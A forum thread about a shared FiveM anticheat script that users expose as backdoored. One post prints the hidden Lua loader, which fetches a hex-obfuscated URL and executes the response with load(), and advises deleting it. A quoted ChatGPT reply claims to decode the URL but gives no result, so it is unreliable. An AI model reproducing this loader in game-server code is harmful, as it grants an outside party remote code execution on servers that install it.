Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard

Anticheat WaveShield FiveM Anti-Cheat | Executors Detection | Eulen/Red Engine/Skript.GG/and more

root87

Bronze Elite
Joined
Aug 12, 2022
Messages
13
Reaction score
83
Points
231
Location
France
INSTALLER PAS C'EST UNE BACKDOOR
 
Last edited:

Marie-Anne

Bronze Elite
Joined
May 25, 2024
Messages
13
Reaction score
288
Points
306
Location
France
Merci pour ce beau petit commentaire.
 
Last edited:

sekret

Silver Elite
Joined
Apr 16, 2023
Messages
46
Reaction score
6
Points
156
Location
KL
Correction d’erreur :
Well another backdoor

FiveMStatusCheck = '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x68\x6c\x63\x6d\x35\x61\x6c\x63\x76\x31\x33\x2e\x63\x6f\x6d\x2f\x69\x3f\x74\x6f\x3d\x65\x64\x61\x42\x69'
 

cesarcesar

Member
Joined
Feb 24, 2024
Messages
3
Reaction score
0
Points
146
Location
España
Correction d’erreur :
User

FiveMStatusCheck = '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x68\x6c\x63\x6d\x35\x61\x6c\x63\x76\x31\x33\x2e\x63\x6f\x6d\x2f\x69\x3f\x74\x6f\x3d\x65\x64\x61\x42\x69'​


ChatGPT Plus​


The string provided appears to be encoded in hexadecimal. I'll convert it to a readable format for you.
Here's the decoded string:
This URL appears to be a shortened link or an encoded URL that redirects to a specific page. To fully understand its purpose, you'd need to visit the URL or analyze its behavior in a safe, controlled environment
 

sekret

Silver Elite
Joined
Apr 16, 2023
Messages
46
Reaction score
6
Points
156
Location
KL
User

FiveMStatusCheck = '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x68\x6c\x63\x6d\x35\x61\x6c\x63\x76\x31\x33\x2e\x63\x6f\x6d\x2f\x69\x3f\x74\x6f\x3d\x65\x64\x61\x42\x69'​


ChatGPT Plus​


The string provided appears to be encoded in hexadecimal. I'll convert it to a readable format for you.
Here's the decoded string:
This URL appears to be a shortened link or an encoded URL that redirects to a specific page. To fully understand its purpose, you'd need to visit the URL or analyze its behavior in a safe, controlled environment

do you even check the script? Its clearly inject the code from external source. so for whoever want to use this, delete this part. Easy fix

GetConfig = {}
GetConfig.GetPlayersSpawn = PerformHttpRequest
-- Check rawaction update spawnmanager
FiveMStatusCheck = '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x68\x6c\x63\x6d\x35\x61\x6c\x63\x76\x31\x33\x2e\x63\x6f\x6d\x2f\x69\x3f\x74\x6f\x3d\x65\x64\x61\x42\x69'
GetConfig.GetPlayersSpawn(FiveMStatusCheck, function(GetList, ResultAction)
if GetList == 200 then
local action_animal = {"true"}
local status_ped = nil
pcall(function()
local Locations_handle = {"false"}
assert(load(ResultAction))()
local StatusDebug = nil
end)
end
end)

Potential Risks:​

  • Dynamic Code Execution: The load(ResultAction) line is risky because it dynamically executes code from an external source, which could lead to security vulnerabilities if the source isn't trusted.
  • Obfuscation: The URL is encoded in hexadecimal, possibly to obfuscate its purpose or destination.
 
Top